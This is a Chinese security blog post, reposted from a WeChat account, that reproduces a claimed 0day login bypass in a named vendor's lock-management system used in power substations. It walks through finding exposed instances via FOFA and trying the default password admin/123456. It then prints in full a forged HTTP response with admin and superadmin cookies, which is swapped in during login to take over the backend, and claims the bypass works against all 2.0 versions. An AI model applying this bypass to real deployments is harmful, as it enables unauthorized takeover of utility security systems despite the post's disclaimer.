漏洞复现-某系统0day

  • A+
所属分类:安全文章

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录

 

漏洞简介:

江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。


复现原理:

在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。


复现过程:


首先fofa一个系统,大概长下面这样:

漏洞复现-某系统0day

尝试弱口令登录(admin/123456):

漏洞复现-某系统0day

这里注意到登录成功的返回包里似乎都是固定值,并没有随机的cookie产生,所以直接尝试把这个正确的返回包去替换其他网站的登陆包:

看到下面的登录是账号密码错误:

漏洞复现-某系统0day

在登录的时候直接抓包替换返回包:

替换下面的数据为:

HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319Set-Cookie: username=admin; path=/Set-Cookie: code=admin; path=/Set-Cookie: power=1; path=/Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/X-Powered-By: ASP.NETDate: Sat, 05 Jun 2021 01:36:06 GMTConnection: closeContent-Length: 1
0

漏洞复现-某系统0day

漏洞复现-某系统0day


放包后登录成功:

漏洞复现-某系统0day

经过测试发现,可以通杀2.0版本。

本文始发于微信公众号(Fight Tigers Team):漏洞复现-某系统0day

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: